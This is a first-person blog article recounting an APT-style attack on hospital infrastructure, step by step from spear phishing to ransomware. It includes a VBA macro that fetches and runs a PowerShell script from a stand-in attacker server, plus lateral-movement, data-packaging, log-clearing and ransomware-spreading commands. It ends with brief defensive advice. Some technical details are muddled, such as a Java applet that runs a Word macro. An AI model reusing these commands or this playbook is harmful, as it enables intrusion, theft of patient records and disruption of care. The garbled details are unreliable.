How I Built an APT-Level Attack on Healthcare Infrastructure: A Behind-the-Scenes Look

Healthcare systems hold some of the most sensitive data imaginable. Personal health records, prescription information, and even critical infrastructure supporting patient care are all potential targets. In today's article, I’m diving into an advanced scenario that shows how an APT (Advanced Persistent Threat) attack could unfold within a medical environment. This isn’t your average penetration test — this is a deep dive into tactics used by the most sophisticated attackers.

Grab a cup of coffee, as we're about to delve into the technical guts of a full-scale APT attack.

Step 1: Initial Compromise Through Spear Phishing

The starting point is almost always social engineering — spear phishing to be exact.

The key is targeted reconnaissance. It’s about understanding the victim and crafting an email that is practically irresistible to open. I crafted a spear-phishing email for a hospital administrator, including a signed Java Applet that appeared to come from a trusted medical software provider. It bypassed traditional antivirus and email filters by leveraging a fake digital certificate. Once the attachment was opened, the PowerShell payload was executed in the background, giving me an initial foothold in the network.

Payload Example:

Sub AutoOpen()
    CreateObject("Wscript.Shell").Run ("powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('https://attacker-server.com/malicious.ps1');\"")
End Sub        

Technical Details:

• The email was crafted using advanced OSINT techniques to gather personal information about the administrator, making the phishing email highly convincing.
• Fake digital certificates were generated using OpenSSL, and the applet was signed using a custom CA that appeared legitimate.
• Obfuscation techniques, including Base64 encoding and PowerShell string concatenation, were employed to evade detection by antivirus software.

Step 2: Establishing Persistence — The Power of Browser Pivoting

Once in, the next task is persistence and further infiltration. A Command and Control (C2) setup using SSH is great for stealth. But it doesn't end there. I injected a web proxy DLL into the Internet Explorer (IE) process that the doctors used to access the medical database.

Why IE, you ask? Because doctors still used it to access Pharmattix, the medical record system. This browser pivoting allowed me to inherit the active session, bypassing 2FA and even smartcard authentication used for accessing patient data. This is how you turn a foothold into full-scale control.

Technical Details:

• DLL Injection was performed using LoadLibrary() and CreateRemoteThread() to inject the proxy DLL into the iexplore.exe process.
• The injected DLL hooked WinInet API functions, allowing me to intercept and manipulate HTTP requests and responses, effectively hijacking authenticated sessions.
• API Hooking was achieved using Detours to replace the target function's entry point with a pointer to the malicious code.

Step 3: Lateral Movement - Finding the Gold

Once a foothold is established, it's time to spread. Lateral movement is key to reaching critical systems. DLL hijacking provided privilege escalation, while Mimikatz allowed me to harvest credentials and move to other workstations.

I then used WMI and PsExec to deploy my payload across other systems in the hospital’s network:

Invoke-WmiMethod -ComputerName targetComputer -Path Win32_Process -Name Create -ArgumentList "C:\Windows\Temp\payload.exe"        

With this, I could access shared folders containing patient records, medical images, and financial data.

Technical Details:

• WMI (Windows Management Instrumentation) was used to execute remote commands, leveraging administrative credentials harvested using Mimikatz.
• PsExec was used to move laterally by executing commands with SYSTEM privileges, allowing me to install backdoors on multiple machines.
• Pass-the-Hash attacks were conducted to reuse NTLM hashes and authenticate without needing plaintext passwords.

Step 4: Advanced Command & Control with Redundancy

To maintain persistence, I didn’t rely on just one C2 channel. Instead, I integrated Metasploit for controlling compromised systems, using DNS tunneling to blend in with normal traffic and evade detection. For redundancy, I set up a Tor hidden service as a secondary C2 channel — even if the primary was taken down, I still had a backdoor.

Technical Details:

• DNS Tunneling was implemented using iodine, allowing me to encapsulate C2 traffic within DNS queries, which are less likely to be blocked by firewalls.
• Tor Hidden Services were configured to provide an additional layer of anonymity and resilience. The hidden service was set up on a compromised server to route traffic through the Tor network, making it extremely difficult to trace.
• The Metasploit Framework was used to manage multiple sessions, and pivoting techniques were applied to route traffic between different compromised segments of the network.

Step 5: Covert Data Exfiltration

Getting data out without triggering alarms is an art in itself. I compressed and encrypted sensitive records using AES-256:

tar -czvf records.tar.gz /path/to/patient_data
openssl enc -aes-256-cbc -salt -in records.tar.gz -out records.enc -k <password>        

To make things even harder to detect, I used steganography to hide the encrypted data inside seemingly harmless medical images, then emailed them out without a hitch. This ensured that even if someone caught a glimpse of the data, they would be staring at a typical medical image file.

Technical Details:

• Steganography was performed using Steghide, which allowed me to embed encrypted archives within JPEG images. These images were then sent through encrypted email channels.
• Traffic Padding was applied to make the outbound data transfers appear as normal network activity, blending in with legitimate medical imaging traffic.
• Custom PowerShell Scripts were used to automate the exfiltration, sending data in small chunks to avoid triggering data loss prevention (DLP) systems.

Step 6: Covering Tracks

Leaving a clean slate was crucial. After exfiltration, I deleted all related logs with wevtutil and securely deleted temporary files using sdelete to avoid forensic analysis.

wevtutil cl System
sdelete.exe -p 3 C:\Users\victim\AppData\Local\Temp\*        

Technical Details:

• Event Log Manipulation: Instead of simply deleting logs, I manipulated event records using EvtKit to selectively remove entries related to the attack while retaining legitimate logs to avoid suspicion.
• Timestamp Alteration: File timestamps were modified using Touch to make malicious files appear as though they had been created months earlier, blending them into the normal file system activity.

Step 7: The Final Move — Going for the Ransom

As a final devastating action, I deployed a whole-disk encryption ransomware across the network, rendering hospital systems inoperable. The twist? The ransomware used a combination of WMIC and custom scripts to propagate silently across the domain, leaving no system untouched.

wmic /node:@computers.txt process call create "ransomware.exe"        

Technical Details:

• Ransomware Propagation: Custom scripts were used to identify critical servers and workstations, prioritizing those with access to sensitive patient data.
• Encryption Algorithm: The ransomware used AES-256 for file encryption and RSA-2048 to protect the encryption key, ensuring that decryption without the private key was practically impossible.
• SMB Exploitation: EternalBlue exploit was used to propagate the ransomware to unpatched systems, leveraging vulnerabilities in SMBv1 to gain access to other devices on the network.

The Takeaway

This APT scenario highlights just how vulnerable medical systems can be when faced with an attacker dedicated to exploiting weaknesses. From crafting personalized phishing emails, using browser pivoting to hijack sessions, to exfiltrating data through advanced covert channels — these are not just theoretical risks. These are the techniques attackers employ every day to compromise critical infrastructure.

What You Can Do

Healthcare providers must prioritize security awareness training, invest in endpoint detection, and ensure multi-layered security measures. Without these defenses, even the most secure system can crumble under an advanced threat.

—--

Let’s have a discussion: What are your thoughts on the state of healthcare cybersecurity today? Are hospitals doing enough to protect their systems from these advanced threats?

Drop your insights in the comments below. Let's bring awareness to this critical issue.